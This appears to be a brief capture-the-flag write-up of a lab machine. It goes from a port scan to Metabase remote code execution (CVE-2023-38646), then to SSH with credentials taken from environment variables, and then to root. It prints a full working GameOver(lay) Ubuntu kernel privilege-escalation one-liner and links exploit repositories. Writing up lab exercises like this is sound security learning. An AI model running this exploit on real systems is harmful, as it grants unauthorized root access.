First we start with an nmap scan of the box

 

 

We see that port 80 is open which is used by HTTP

Add the analytical.htb to our /etc/hosts file and navigate to the site

 

 

We see a static webpage with a login feature that 

bring http://data.analytical.htb/

 

 

The site is using metabase which some versions are vulnerable to due to an unprotected setup token

 

 

This allows us to create a new user on the database giving us remote code execution

https://github.com/kh4sh3i/cve-2023-38646

We are now on the box but there is no flag yet but if we look at the environment variables we see credential that allow us to ssh into the machine

 

 

Now we ssh and find the flag.txt in the home directory

 

 

We do not have sudo permission

 

 

The box is using ubuntu kernel version 6.2.0 which is vulnerable to the GameOver(lay) local priv esc attack

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629

```

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

```

Once the poc command is executed we have root permissions and find the flag in /root directory